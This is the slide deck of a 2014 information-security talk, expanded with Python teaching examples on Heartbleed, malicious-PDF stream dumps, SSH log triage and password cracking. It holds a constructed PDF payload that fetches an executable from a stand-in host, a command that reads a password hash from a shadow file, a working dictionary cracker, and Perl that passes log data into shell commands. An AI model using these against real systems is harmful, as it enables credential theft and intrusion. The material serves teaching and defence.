Page 1: How Safe is your Data?

5/12/2014 How Safe is Your Data? 1/33

How Safe is Your Data? TAPPS, 12 May 2014

Michael Soltys, McMaster University / Executek

Page 2: How Safe is your Data?


Information Security

Key in a knowledge-based economy; key to safety: at a personal, organizational, and national level

As technology evolves, so do the threats

User behavior:

- choose good passwords

- update software regularly

- authenticate

Advanced practice:

- comes down to the unsolved problem of writing correct software

- Big data analytics

Page 3: How Safe is your Data?


Large scale attacks: U of Maryland

A single attack can affect large numbers of people:

In February 2014 the University of Maryland faced what it called a

"sophisticated cyber-attack"

which breached the records of more than 287,000 present and past students

Page 4: How Safe is your Data?


Large scale vulnerabilities: Heartbleed Bug

allows an attacker to read the memory of a vulnerable OpenSSL process (typically a web server, though clients talking to a malicious server are affected too)

affects all versions of OpenSSL in the 1.0.1 series up to and including 1.0.1f

the defect could be used to reveal up to 64 kilobytes of the application's memory per malicious heartbeat message, and the message can be repeated at will (CVE-2014-0160)

The Canada Revenue Agency (CRA) shut down its electronic services website over Heartbleed security concerns

OpenSSL validated under FIPS 140-2 by NIST!

(FIPS = Federal Information Processing Standards; NIST = National Institute of Standards and Technology. The validation covers the OpenSSL FIPS Object Module, that is, the cryptographic primitives; the heartbeat code lives in the TLS layer outside that module, and the bug is a missing bounds check, not a weakness in any cipher. Certified cryptography does not protect against an ordinary memory-safety error in the code around it.)
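The following Python is an added example, not code from the slides or from OpenSSL. It models the logic error behind CVE-2014-0160 on a byte string standing in for the server's heap: the vulnerable handler echoes back as many bytes as the attacker's length field claims, while the fixed handler first checks that claim against the number of bytes actually received (the check OpenSSL 1.0.1g added). The record layout follows the heartbeat message format; SECRET, the function names and the 60000-byte claim are constructed for the demonstration.

```python
import struct

TLS1_HB_REQUEST = 1
TLS1_HB_RESPONSE = 2
HB_PADDING = 16      # a heartbeat message ends with at least 16 bytes of padding

# Constructed stand-in for whatever sits next to the record in the process heap
# (session cookies, key material, other users' requests).  Not real data.
SECRET = b"Cookie: session=4f3a9c; -----BEGIN RSA PRIVATE KEY----- MIIEow..."


def make_record(claimed_len, payload):
    """A heartbeat request: type, 16-bit payload length, payload, padding.
    The length field is attacker controlled and may exceed the real payload."""
    return struct.pack("!BH", TLS1_HB_REQUEST, claimed_len) + payload + b"\x00" * HB_PADDING


def process_memory(record):
    """Lay the received record out directly in front of SECRET."""
    return record + SECRET


def heartbeat_vulnerable(memory, record_len):
    """Pre-1.0.1g logic: the claimed length is trusted and record_len is never
    consulted, so the reply copies whatever follows the record in memory."""
    hb_type, claimed = struct.unpack("!BH", memory[:3])
    if hb_type != TLS1_HB_REQUEST:
        return None
    payload = memory[3:3 + claimed]              # over-read: bounded by the heap, not the record
    return struct.pack("!BH", TLS1_HB_RESPONSE, claimed) + payload + b"\x00" * HB_PADDING


def heartbeat_fixed(memory, record_len):
    """1.0.1g logic: the claimed length must fit inside the bytes actually received."""
    if record_len < 1 + 2 + HB_PADDING:
        return None                              # too short to be a heartbeat: discard
    hb_type, claimed = struct.unpack("!BH", memory[:3])
    if hb_type != TLS1_HB_REQUEST:
        return None
    if 1 + 2 + claimed + HB_PADDING > record_len:
        return None                              # length field lies: discard silently
    payload = memory[3:3 + claimed]
    return struct.pack("!BH", TLS1_HB_RESPONSE, claimed) + payload + b"\x00" * HB_PADDING


def leaked_bytes(response):
    """Length of the longest prefix of SECRET that appears in a reply (0 = no leak)."""
    if response is None:
        return 0
    n = 0
    while n < len(SECRET) and SECRET[:n + 1] in response[3:]:
        n += 1
    return n


if __name__ == "__main__":
    for label, rec in (("honest", make_record(5, b"hello")),
                       ("lying ", make_record(60000, b"hello"))):
        mem = process_memory(rec)
        for handler in (heartbeat_vulnerable, heartbeat_fixed):
            reply = handler(mem, len(rec))
            print(f"{label} {handler.__name__:21s} -> leaked {leaked_bytes(reply)} bytes of SECRET")
```

Run it and the lying record leaks all of SECRET through the vulnerable handler and nothing through the fixed one, while the honest record gets the same reply from both. The 16-bit length field caps a single reply at 64 KB, which is why the slide's figure is per request rather than a total.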

Page 5: How Safe is your Data?


New types of attacks

The field is not static; new attacks are clever and inventive:

Drive-by downloads: where a user browsing a compromised or malicious web site has rogue programs installed on their machine without deliberately downloading anything.

Spear phishing: where specific individuals or organisations are targeted with fake emails to obtain confidential information.

Watering hole: about one in 20 attacks uses this strategy. Rather than trying to break into an organisation's network directly, the attacker compromises other web sites that its people regularly visit, with the aim of infecting their computers and getting the unwitting carrier to bring the malware back into their own network.

Page 6: How Safe is your Data?


A typical attack: Malicious PDFs

In March 2014 a massive scam email was sent in Colombia, claiming to be from one of the country's credit score agencies.

The email carried a PDF attachment. Antimalware software found no malicious payload when it scanned the file.

However, a "stream dump" of the file (decompressing and reading each of the PDF's stream objects) shows:

Malicious scripting, which instructs the PDF reader to open a URL. The file downloaded from that URL installs a keylogger.
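An added example, in Python, of the "stream dump" step; it is not the ISC analysis and not the Colombian file. The sample PDF is constructed here: its catalog (with an /OpenAction) and a JavaScript action that opens a URL are packed into a Flate-compressed object stream, so a keyword scan of the raw bytes sees nothing, while inflating each stream exposes the action and the URL. The URL, object numbers and keyword list are assumptions for the demonstration; the decoder handles only /FlateDecode and is a triage aid, not a PDF parser.

```python
import re
import zlib

# Keywords that pdfid-style triage tools flag for a closer look.  The list is
# kept short on purpose: the point is where the keywords hide, not the list.
SUSPICIOUS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch", b"/URI", b"/EmbeddedFile")
URL_RE = re.compile(rb"https?://[^\s\"'()<>]+")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)


def build_sample_pdf():
    """Constructed sample: catalog and JavaScript action live inside a
    Flate-compressed object stream (/ObjStm), so none of the interesting
    keywords appear as plain bytes.  Minimal on purpose (no xref table)."""
    catalog = b"<< /Type /Catalog /Pages 2 0 R /OpenAction 6 0 R >>"
    action = (b"<< /S /JavaScript "
              b"/JS (app.launchURL(\"http://malware.example/score.exe\", true)) >>")
    header = b"1 0 6 %d " % (len(catalog) + 1)        # ObjStm: "objnum offset" pairs
    body = zlib.compress(header + catalog + b" " + action)
    objstm_dict = (b"<< /Type /ObjStm /N 2 /First %d /Filter /FlateDecode /Length %d >>"
                   % (len(header), len(body)))
    return (b"%PDF-1.5\n"
            b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
            b"5 0 obj\n" + objstm_dict + b"\nstream\n" + body + b"\nendstream\nendobj\n"
            b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")


def scan_raw(data):
    """What a plain keyword scan of the file bytes sees."""
    return {k for k in SUSPICIOUS if k in data}


def dump_streams(data):
    """Yield (stream dictionary, decoded content) for each stream in the file.
    The dictionary is taken as the text from the last '<<' before 'stream';
    good enough for triage, not for nested dictionaries or filter arrays."""
    for m in STREAM_RE.finditer(data):
        dic = data[data.rfind(b"<<", 0, m.start()):m.start()]
        content = m.group(1)
        if b"/FlateDecode" in dic:
            try:
                content = zlib.decompress(content)
            except zlib.error:
                continue          # corrupt or multi-filter stream: hand off to a real parser
        yield dic, content


def scan_streams(data):
    """Keywords and URLs visible only after inflating the streams."""
    hits, urls = set(), []
    for _, content in dump_streams(data):
        hits.update(k for k in SUSPICIOUS if k in content)
        urls += [u.decode("latin-1") for u in URL_RE.findall(content)]
    return hits, urls


SAMPLE_PDF = build_sample_pdf()

if __name__ == "__main__":
    print("raw scan   :", sorted(scan_raw(SAMPLE_PDF)) or "nothing")
    hits, urls = scan_streams(SAMPLE_PDF)
    print("stream dump:", sorted(hits))
    print("URLs       :", urls)
```

The raw scan reports nothing, exactly the situation on the slide; the stream dump reports /OpenAction, /JavaScript and /JS together with the URL the script would fetch, which is the indicator to block and hunt for.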

Page 7: How Safe is your Data?


2011: A Bad Year

When the history of 2011 is written, it may well be remembered as the Year of the Hack. Stories of computer breaches were breaking almost every week:

- the British National Health Service

and the Web sites of:

- the U.S. Senate
- the C.I.A.

all fell victim to highly publicized cyber-attacks. Many of the breaches have been attributed to the groups Anonymous and LulzSec.

Page 8: How Safe is your Data?


Operation Shady Rat

Operation Shady RAT ranks with Operation Aurora (the attack on Google and many other companies in 2010) as among the most significant and potentially damaging acts of cyber-espionage yet made public.

Operation Shady RAT has been stealing valuable intellectual property (including government secrets, email archives, legal contracts, negotiation plans for business activities, and design schematics) from more than 70 public and private sector organizations in 14 countries.

The list of victims, which ranges from national governments to global corporations to tiny nonprofits, demonstrates with unprecedented clarity the universal scope of cyber-espionage and the vulnerability of organizations in almost every category imaginable.

Page 9: How Safe is your Data?


Operation Shady Rat

The vast majority of victims, 49, were U.S. based companies, government agencies, and nonprofits. The category most heavily targeted was defense contractors, 13 in all.

All the signs point to China.

Forensic investigation revealed that the defense contractor had been hit by a species of malware that had never been seen before: a spear-phishing email containing a link to a Web page that, when clicked, automatically loaded a malicious program, a remote access tool, or RAT, onto the victim's computer.

The rat opened the door for a live intruder to get on the network, escalate user privileges, and begin exfiltrating data.

Page 10: How Safe is your Data?


Victims don't want to be victims

McAfee sent emails to officials at four organizations, informing them that their computer networks had been compromised.

Three of those organizations, including one whose breach is ongoing, made no response to McAfee's notifications.

"Victims don't want to know they're victims. I guess that's just victim psychology: if you don't know about it, it's not really happening."

[Video: CNN, Operation Shady RAT]

Page 11: How Safe is your Data?


An innocuous click

RSA is the security division of the high-tech company EMC. Its products protect computer networks at the

White House

the Central Intelligence Agency

the National Security Agency

the Pentagon

the Department of Homeland Security,

as well as most top defense contractors, and a majority of Fortune 500 corporations.

Page 12: How Safe is your Data?


An innocuous click

Sometime in the winter of 2011, lying there in the junk-mail folder, in the spammy mess of mortgage offers and erectile-dysfunction drug ads, an email from an associate with a subject line that looked legit caught the man's eye.

The subject line said "2011 Recruitment Plan."

The man clicked on the message, downloaded the attached Excel spreadsheet file, and unwittingly set in motion a chain of events allowing hackers to raid the computer networks of his employer, RSA.

The parent company disclosed the breach on March 17, 2011, in a filing with the Securities and Exchange Commission. The hack gravely undermined the reputation of RSA's popular SecurID security service.

Page 13: How Safe is your Data?


An innocuous click

Experts found evidence that the attack on RSA had come from China.

They also linked the RSA attack to the penetration of computer networks at some of RSA's most powerful defense-contractor clients, among them:

Lockheed Martin, Northrop Grumman, L-3 Communications

Few details of these episodes have been made public.


Page 14: How Safe is your Data?


Operation Aurora

In 2010 Google became the first major company to blow the whistle on Chinese hacking when it admitted to a penetration known as Operation Aurora, which also hit:


Morgan Stanley

and several dozen other corporations

Most companies have preferred not to talk about or even acknowledge violations of their computer systems, for fear of panicking shareholders and exposing themselves to lawsuits.

Or for fear of offending the Chinese and jeopardizing their share of that country's exploding markets.

Page 15: How Safe is your Data?


Operation Aurora

Chinese hackers who breached Google's servers several years ago gained access to a sensitive database with years' worth of information about U.S. surveillance targets, according to current and former government officials.

The breach appears to have been aimed at unearthing the identities of Chinese

Page 16: How Safe is your Data?


Attempted logins

Page 17: How Safe is your Data?


Attempted logins





sub compute_ip {
    # Resolve a host name taken from the login log to an address with dig.
    # @_ is log data: interpolating it into a shell command is a command-injection
    # risk unless the value has been validated as a plain host name first.
    $IP = `dig @_ +short`;
    chomp $IP;
    if ($IP) {
        print "\t\t IP= $IP <br>";
    }
    else {
        print "\t\t IP= ? <br> \n";
    }
}

sub compute_location {
    # Map the address to a country with the GeoIP command-line tool; the regex
    # keeps the trailing country name from "GeoIP Country Edition: XX, Name".
    $country = `/sw/bin/geoiplookup @_`;
    $country =~ m/([ A-Za-z]*)$/;
    $country_short = $1;
    if ($country_short) {
        print "\t\t Country= $country_short <br>\n\n";
    }
    else {
        print "\t\t Country= ? <br> \n\n";
    }
}
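The Perl above decorates an address once it is known to be interesting. The step before that, deciding from the log itself which addresses are interesting, is shown here in Python as an added example (not the author's script). The sshd lines are constructed, the threshold of five failures is an assumption, and the finding a responder wants first is a source that succeeded after failing repeatedly.

```python
import re
from collections import Counter, defaultdict

# Constructed sshd lines in syslog format; not taken from the author's server.
SAMPLE_LOG = """\
May 12 03:14:01 host sshd[2210]: Failed password for invalid user admin from 203.0.113.7 port 51122 ssh2
May 12 03:14:03 host sshd[2211]: Failed password for invalid user oracle from 203.0.113.7 port 51130 ssh2
May 12 03:14:05 host sshd[2212]: Failed password for root from 203.0.113.7 port 51141 ssh2
May 12 03:14:06 host sshd[2213]: Failed password for root from 203.0.113.7 port 51150 ssh2
May 12 03:14:08 host sshd[2214]: Failed password for root from 203.0.113.7 port 51160 ssh2
May 12 03:14:09 host sshd[2215]: Failed password for root from 203.0.113.7 port 51171 ssh2
May 12 08:02:11 host sshd[2301]: Failed password for alice from 198.51.100.23 port 40210 ssh2
May 12 08:02:20 host sshd[2302]: Accepted publickey for alice from 198.51.100.23 port 40210 ssh2
May 12 09:30:00 host sshd[2410]: Accepted password for root from 203.0.113.7 port 52000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse(log):
    """One dict per authentication event; lines that are not auth events are skipped."""
    return [m.groupdict() for m in map(LINE_RE.match, log.splitlines()) if m]


def summarize(events, threshold=5):
    """Per-source failure counts, the user names each source tried, the sources
    over the threshold, and (the alert) successes from such a source."""
    failed = Counter()
    users = defaultdict(set)
    successes = defaultdict(list)
    for e in events:
        if e["result"] == "Failed":
            failed[e["ip"]] += 1
            users[e["ip"]].add(e["user"])
        else:
            successes[e["ip"]].append(e["user"])
    brute_force = {ip for ip, n in failed.items() if n >= threshold}
    compromised = {ip: successes[ip] for ip in brute_force if successes[ip]}
    return {"failed": failed, "users": users, "brute_force": brute_force, "compromised": compromised}


if __name__ == "__main__":
    report = summarize(parse(SAMPLE_LOG))
    for ip, n in report["failed"].most_common():
        flag = "BRUTE FORCE" if ip in report["brute_force"] else ""
        print(f"{ip:16} failed={n:3} users={sorted(report['users'][ip])} {flag}")
    for ip, who in report["compromised"].items():
        print(f"ALERT: {ip} logged in as {who} after repeated failures")
```

The addresses this flags are the ones worth feeding to the dig and geoiplookup helpers; the single failure from 198.51.100.23 followed by a key-based success is ordinary user behaviour and stays below the threshold.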

Page 18: How Safe is your Data?


Estonia 2007

In the Spring of 2007, government computer systems in Estonia experienced a sustained cyberattack (cyber-{warfare, terror, crime}).

On April 27, officials in Estonia moved a Soviet-era war memorial commemorating an unknown Russian who died fighting the Nazis. The move stirred emotions, and led to rioting by ethnic Russians, and the blockading of the Estonian Embassy in Moscow.

Page 19: How Safe is your Data?


Estonia 2007

The event marked the beginning of a series of large and sustained Distributed Denial-Of-Service (DDOS) attacks launched against several Estonian national websites.

In the early days of the cyberattack, government websites that normally receive around 1,000 visits a day reportedly were receiving 2,000 visits every second. This caused the repeated shutdown of some websites.

The cyberattacks against Estonia were unusual because the packet rate was very high, and the series of attacks lasted weeks rather than the hours or days more commonly seen for a DoS attack.

Eventually, NATO and the United States sent computer security experts to Estonia to help recover from the attacks, and to analyze the methods used and attempt to determine the source of the attacks.

Page 20: How Safe is your Data?


Estonia 2007

A persistent problem during and after any cyberattack is accurate identification of the attacker:

was it sponsored by a nation?

was it the independent work of a few unconnected individuals?

was it initiated by a group to instill frustration and fear by damaging the computerized infrastructure and economy?

Not knowing the initiator also affects the decision about who should ultimately become a target for retaliation, and whether the response should come from law enforcement or the military.

After some investigation, network analysts later concluded that the cyberattacks targeting Estonia were not a concerted attack, but instead were the product of spontaneous anger from a loose federation of separate attackers.

Page 21: How Safe is your Data?



Botnet = "Robot Network"

Botnets are made up of vast numbers of compromised computers that have been infected with malicious code, and can be remotely controlled through commands sent via the Internet.

Hundreds or thousands of these infected computers can operate in concert to:

- disrupt or block Internet traffic for targeted victims
- harvest information
- distribute spam, viruses, or other malicious code.

Page 22: How Safe is your Data?



Botmasters can reportedly make large sums of money by marketing their technical services.

For example, Jeanson Ancheta, a 21-year-old hacker and member of a group called the Botmaster Underground, reportedly made more than $100,000 from different Internet advertising companies who paid him to download specially designed malicious adware code onto more than 400,000 vulnerable PCs he had secretly infected and taken over.

He also made tens of thousands more dollars renting his 400,000-unit botnet herd to other companies that used them to send out spam, viruses, and other malicious code on the Internet.

PPI: Pay-per-Install - The Commoditization of Malware Distribution

In 2006, Ancheta was sentenced to five years in prison (FBI operation Bot Roast).

Symantec reported that it detected 6 million bot-infected computers in the second halfof 2006.

Page 23: How Safe is your Data?



Some botnet owners reportedly rent their huge networks for US$200 to $300 an hour, and botnets are becoming the weapon of choice for fraud and extortion.

Newer methods are evolving for distributing bot software that may make it even more difficult in the future for law enforcement to identify and locate the originating botmaster.

Botnets organize themselves in a hierarchical manner, with a central command and control location (sometimes dynamic) for the botmaster.

This central command location is useful to security professionals because it offers a possible central point of failure for the botnet.

However, in the near future, attackers may use new botnet architectures that are more sophisticated, and more difficult to detect and trace, e.g., P2P.

Page 24: How Safe is your Data?


E.g., WordPress

A fantastic piece of software for blogging, but it consists of many parts, each of which can carry its own vulnerabilities:

MySQL; Apache; PHP; HTML; JavaScript; Mac OS X Server

It is essential to keep every component at its latest version and to use strong passwords.

Page 25: How Safe is your Data?



Your password must be a minimum of 8 characters in length and must include characters from at least three of the four groups below:

Uppercase letters: A, B, C, ... ,Z

Lowercase letters: a, b, c, ...,z

Numerals: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9

Symbols: ~ ! @ # $ % ^ & * ( ) _ + ` - = { } | ] [ \ : " ; < > ? , . / '

Do not use any of your last five previous passwords.

Passwords cannot contain your account name or parts of your full name.

Generate with a seed, a name, and an MD5 hash generator

E.g., [email protected] use seed 5a63y@h& to obtain:

hash: ae19e19070a052b85306fc758146ef8e

(Caveat: a hex digest consists only of lowercase letters and digits, so the raw hash covers just two of the four groups above and would be rejected by the policy as stated unless it is post-processed. Also, anyone who learns the seed can regenerate every password derived from it.)
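An added example in Python (not the slide's generator) that checks a candidate against the rules on this slide and shows the MD5 scheme's gap: the bare hex digest fails the three-of-four rule, so the example appends one symbol and one uppercase letter selected by digest bytes, which keeps the password reproducible from seed and name. The e-mail address is constructed, since the slide's is not shown, and the appended-character step is this example's addition rather than the slide's.

```python
import hashlib
import string

SYMBOLS = set("~!@#$%^&*()_+`-={}|][\\:\";<>?,./'")   # the slide's symbol group
SYMBOL_CHOICES = "~!@#$%^&*()_+"                       # subset used when strengthening


def policy_violations(password, account_name, full_name="", history=()):
    """Check a password against the rules on the slide.  Returns the list of
    rules it breaks; an empty list means it is acceptable."""
    problems = []
    if len(password) < 8:
        problems.append("shorter than 8 characters")
    groups = [any(c in string.ascii_uppercase for c in password),
              any(c in string.ascii_lowercase for c in password),
              any(c in string.digits for c in password),
              any(c in SYMBOLS for c in password)]
    if sum(groups) < 3:
        problems.append(f"only {sum(groups)} of 4 character groups")
    lowered = password.lower()
    for part in [account_name] + full_name.split():
        if part and part.lower() in lowered:
            problems.append(f"contains name part {part!r}")
    if password in history[-5:]:
        problems.append("reused within last five passwords")
    return problems


def derive_password(seed, name, length=16, raw=False):
    """The slide's scheme: MD5 of seed + name.  raw=True returns the bare hex
    digest (lowercase letters and digits only).  Otherwise this example, not the
    slide, appends one symbol and one uppercase letter, both chosen by digest
    bytes, so the result stays reproducible but covers three character groups."""
    digest = hashlib.md5((seed + name).encode()).hexdigest()
    if raw:
        return digest
    sym = SYMBOL_CHOICES[int(digest[-2:], 16) % len(SYMBOL_CHOICES)]
    upper = string.ascii_uppercase[int(digest[-4:-2], 16) % 26]
    return digest[:length - 2] + sym + upper


if __name__ == "__main__":
    # Constructed address and the slide's seed; the slide's address is not shown.
    seed, site = "5a63y@h&", "alice@example.com"
    for candidate in (derive_password(seed, site, raw=True), derive_password(seed, site),
                      "Correct-Horse1", "alice2014"):
        print(f"{candidate:34s} {policy_violations(candidate, 'alice') or 'OK'}")
```

The raw digest is reported as covering only two groups; the strengthened form passes, and so does a passphrase that happens to meet the rules, while a password built from the account name is rejected twice over.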

Page 26: How Safe is your Data?


Uncovered during Executek audits

On a client's computer we discovered that the data was kept in a Dropbox folder, and someone who was not supposed to see it had constant access to the latest version.

Most clients use dictionary passwords and never change them; sometimes they write them down on sticky notes placed on the monitor. Employees who leave keep their passwords, which are not changed immediately, etc.

Software is seldom updated.

The server is secured but the backup module is not.

Page 27: How Safe is your Data?


Sophisticated attacks

Control hijacking attacks: exploits and defenses

Dealing with legacy code: sandboxing and isolation

Exploitation techniques and fuzzing

Tools for writing robust application code

Principle of least privilege, access control, and operating systems security

Security problems in network protocols: TCP, DNS, SMTP, and routing

Unwanted traffic: denial of service attacks


Page 29: How Safe is your Data?


Apache Security

Apache HTTP server access:

The first file is the policy and the second the password:

AuthType Basic
AuthName "Networks & Security Readings 2014"
AuthUserFile cs3c03-w14/ReadingList/.htpasswd
require valid-user

(Two cautions: Basic authentication sends the username and password base64-encoded, not encrypted, with every request, so the protected directory must be served over HTTPS. And Apache's default configuration refuses to serve files whose names begin with .ht, which is what keeps the password file itself from being downloaded; that rule must stay in place.)

The second file contains the username and a hash of the password; two examples:



Page 30: How Safe is your Data?


Apache Security Challenge

I tell my students that the first to break the first password, obtained with the command:

htpasswd -cbd ./.htpasswd nets2014 a5e1c054

gets extra marks. Note the password is not a dictionary word.

Still, it takes about 15 min with readily available password-cracking software. On the other hand, breaking the second password, obtained with the command:

htpasswd -bm ./.htpasswd netsec2013 tigerblood

(-c creates the file; it is omitted for the second entry so that it is appended rather than overwriting the first)

is impractical by exhaustive search (crypt vs md5): -d stores the password with traditional DES-based crypt, which is fast to compute and silently truncates the password to 8 characters, while -m uses Apache's iterated, salted MD5 scheme (apr1), which is far slower per guess and keeps the full length. That is protection against brute force only: a password that appears in the attacker's wordlist falls under either scheme after one hash computation per candidate.

Page 31: How Safe is your Data?


Executek: Breaking into a Super-User account

Obtained the salted SHA-1 hash of the password from the "shadow file":

cat /private/var/db/shadow/hash/[...] | cut -c 169-216

(that 48-character field is the 4-byte salt followed by the 20-byte SHA-1 digest, in hex)

which turns out to be:


and then used:

John the Ripper

to recover the password: onegod

It took only about 20 minutes because the password was a dictionary word!
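An added Python example of why a dictionary word falls to John the Ripper; it is not the author's tooling. The field cut from the shadow file is treated as 8 hex characters of salt followed by the SHA-1 of salt and password (the "xsha" layout as this example assumes it), and a dictionary attack then costs one SHA-1 per candidate. The wordlist, salts and mangling rules are constructed for the demonstration.

```python
import hashlib
import os

# Layout of the 48 hex characters cut from the OS X shadow hash file, as John
# the Ripper's "xsha" format reads it: 8 hex chars of salt, then 40 hex chars
# of SHA1(salt || password).  That layout is an assumption of this example.


def salted_sha1(password, salt=None):
    """Produce a field in that format (used here only to construct test data)."""
    salt = os.urandom(4) if salt is None else salt
    return (salt + hashlib.sha1(salt + password.encode()).digest()).hex().upper()


def variants(word):
    """A handful of JtR-style mangling rules: as typed, capitalised, digit suffixes."""
    yield word
    yield word.capitalize()
    for d in "0123456789":
        yield word + d
    yield word + "123"


def crack(field, wordlist, mangle=True):
    """Dictionary attack against one salted SHA-1 field.  One SHA-1 per candidate
    is all it costs; the salt defeats precomputed tables, not guessing.
    Returns (password or None, number of candidates tried)."""
    salt = bytes.fromhex(field[:8])
    target = field[8:].lower()
    tried = 0
    for word in wordlist:
        for cand in (variants(word) if mangle else (word,)):
            tried += 1
            if hashlib.sha1(salt + cand.encode()).hexdigest() == target:
                return cand, tried
    return None, tried


# Constructed wordlist; a real run feeds a file with millions of entries.
WORDLIST = ["password", "letmein", "welcome", "monkey", "dragon", "onegod", "tigerblood"]


if __name__ == "__main__":
    for pw in ("onegod", "dragon7", "Xk9#qv2Lm"):
        field = salted_sha1(pw)
        found, tried = crack(field, WORDLIST)
        print(f"{field[:8]}... {'cracked: ' + found if found else 'not in list'} after {tried} guesses")
```

The word and its simple variants fall within a few dozen guesses; the random password survives the whole list, and the only thing left for the attacker is exhaustive search, which is where length and character set start to matter.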

Page 32: How Safe is your Data?



CRS Report for Congress 2008

Vanity Fair: Operation Shady Rat 2011

Vanity Fair: Enter the Cyber-Dragon 2011

Malicious PDF (ISC)

Networks Course Password Cracking Challenge

Page 33: How Safe is your Data?


Thank you

Michael Soltys, McMaster University / Executek, [email protected]

@MichaelMSoltys